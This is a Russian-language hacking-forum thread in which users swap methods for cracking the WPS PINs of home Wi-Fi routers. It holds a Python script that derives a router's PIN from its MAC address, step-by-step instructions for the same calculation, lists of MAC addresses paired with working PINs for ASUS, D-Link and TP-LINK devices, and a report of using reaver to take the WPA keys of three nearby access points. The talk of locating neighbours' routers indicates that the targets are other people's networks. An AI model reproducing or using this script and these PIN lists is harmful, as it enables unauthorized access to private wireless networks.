ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.10.2013, 01:07
|
|
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918
Репутация:
40
|
|
Наблюдаю в эфире 11 точек с началом 00-14-D1. Ни к одной метод удачным не был. Видимо надо различать дальнейшие данные мак-адреса или была просто небольшая партия, которой присваивали пин таким образом.
|
|
|
18.10.2013, 01:29
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Для 00:141 попробуй ещё этот пин:
95661469
Он у меня к 7-ми тренднетам подошёл. Но это тоже мало, относительно полного списка проверенных.
|
|
|
|
18.10.2013, 02:46
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Внезапно, алгоритм подошёл к 3 из 7 ASUS-ов, начинающихся с 90:E6:BA:
Код:
[+] 90:E6:BA:BE:CE:51 - 25046571
[-] 90:E6:BA:51:D3:A1 - 94476064
[-] 90:E6:BA:4F:16:6A - 74824137
[-] 90:E6:BA:79:C5:F5 - 59193630
[+] 90:E6:BA:D3:1F:2C - 38360763
[+] 90:E6:BA:BE:D5:13 - 25063875
[-] 90:E6:BA:9E:16:EF - 15179586
|
|
|
|
18.10.2013, 02:57
|
|
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918
Репутация:
40
|
|
Спасибо за полезную информацию. У Асусов бросилось в глаза то, что большие адреса (у которых нужно отбросить первую единицу) получили пин таким образом, кроме последнего.
|
|
|
|
18.10.2013, 03:44
|
|
Active Member
Регистрация: 25.09.2013
Сообщений: 379
Провел на форуме:
135690
Репутация:
3
|
|
Сообщение от russstand
расскажите плиз как расчитать пин по способу из 16 в 10 ? я перелопатил всю ветку, так и не нашёл мануала
калькулятором.
|
|
|
|
18.10.2013, 03:46
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Всё просто:
1. Берёшь три последних байта из BSSID
2. Копируешь их в калькулятор в Hex режиме (шестнадцатиричном)
3. Переводишь в Dec режим (десятичный)
4. Полученное число обрезаешь до 7 цифр от старшего разряда (mod 10000000)
5. Вычисляешь последнюю цифру (контрольную сумму) пина по алгоритму WPS PIN Checksum
Этот же алгоритм используется в проге WPSPIN на ведройд.
Вот, я по-быстрому сделал скрипт на питоне для генерации пина по алгоритму (на базе easybox_wps.py) :
Код:
#!/usr/bin/env python
import sys, re
def gen_pin (mac_str):
pin = int(mac_str[6:12], 16) % 10000000
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%07i%i' % (pin, (10 - accum % 10) % 10)
def main():
if len(sys.argv) != 2:
sys.exit('usage: wpspin.py [BSSID]\n eg. wpspin.py CC:5D:4E:11:22:33\n')
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')
print 'WPS pin:', gen_pin(mac_str)
if __name__ == "__main__":
main()
|
|
|
|
18.10.2013, 16:27
|
|
Member
Регистрация: 21.11.2012
Сообщений: 554
Провел на форуме:
178124
Репутация:
8
|
|
Сообщение от binarymaster
сделал скрипт
Спасибо за скрипт, обнаружил еще вот что:
B8:A3:86
64:70:02
По первому маку статистики пока нет, т.к. он только один раз мне встретился. Второй - два раза, метод 16/10 подошел только к одному.
|
|
|
|
18.10.2013, 17:47
|
|
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373
Репутация:
0
|
|
БЛИН....кто как определяет где примерно точки расположены?а то чесно напрягает.....поствил антенну так,набрал wash,посмотрел сигнал.....опять покрутил антенну и тд......просто,фиг знает,где точка раположена:справа,слева,чу ь нижу,чуть выше и тд.....или проги есть какие то?Вы как вычисляете где точки?просто,когда сигнал -20,то понятно,что прм за стенкой точка,у соседа.....а вот -60 и тд....фиг поймёшь,например я на 3-этаже.....точка может быть на первом,на 5,в другом подъезде и тд....
|
|
|
|
18.10.2013, 19:40
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от Klaatu
Спасибо за скрипт, обнаружил еще вот что:
B8:A3:86
64:70:02
По первому маку статистики пока нет, т.к. он только один раз мне встретился. Второй - два раза, метод 16/10 подошел только к одному.
По B8:A3:86 у меня такая выборка:
Код:
B8:A3:86:1A:E5:84 - 32144154
B8:A3:86:1B:01:08 - 95286457
B8:A3:86:1B:02:E0 - 37057442
B8:A3:86:1F:1F:30 - 55880190
B8:A3:86:1F:39:62 - 04677925
B8:A3:86:42:83:C6 - 46264848
B8:A3:86:43:7C:4D - 46264848
B8:A3:86:45:20:A1 - 76229909
B8:A3:86:52:AC:AB - 81995882
B8:A3:86:53:1A:50 - 54981973
B8:A3:86:6B:55:44 - 31411219
B8:A3:86:6B:55:C0 - 13374655
Ни к одному алгоритм 16/10 не подошёл, зато видны популярные для D-Link-ов пины 46264848 и 76229909.
А по 64:70:02 (TP-LINK) у меня вообще 1 запись...
Код:
64:70:02:73:B3:5C - 99587581
________________________________________
Сообщение от СЕРЖ32
кто как определяет где примерно точки расположены?
попробуй вафле-скан, тут:
http://stascorp.com/load/
(расположен в блоке "Веб приложения" справа, со значком радара)
|
|
|
|
19.10.2013, 06:10
|
|
Участник форума
Регистрация: 15.07.2013
Сообщений: 250
Провел на форуме:
68364
Репутация:
16
|
|
Я оказался неправ...
Вчера по ошибке введя в reaver лишь СЕМЬ цифр (не указав последнюю) был приятно удивлён... Reaver сам подобрал последнюю и выдал PSK. И так три точки подряд. 10 минут - ещё трём точкам "капут".
EC:43:F6 - ZyXEL
90:94:E4 - DIR
C8: D3:A3 - DIR
Кажется ещё совсем недавно думал что WPA-WPA2 практически неуязвимы. Защита с 1 секундой.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
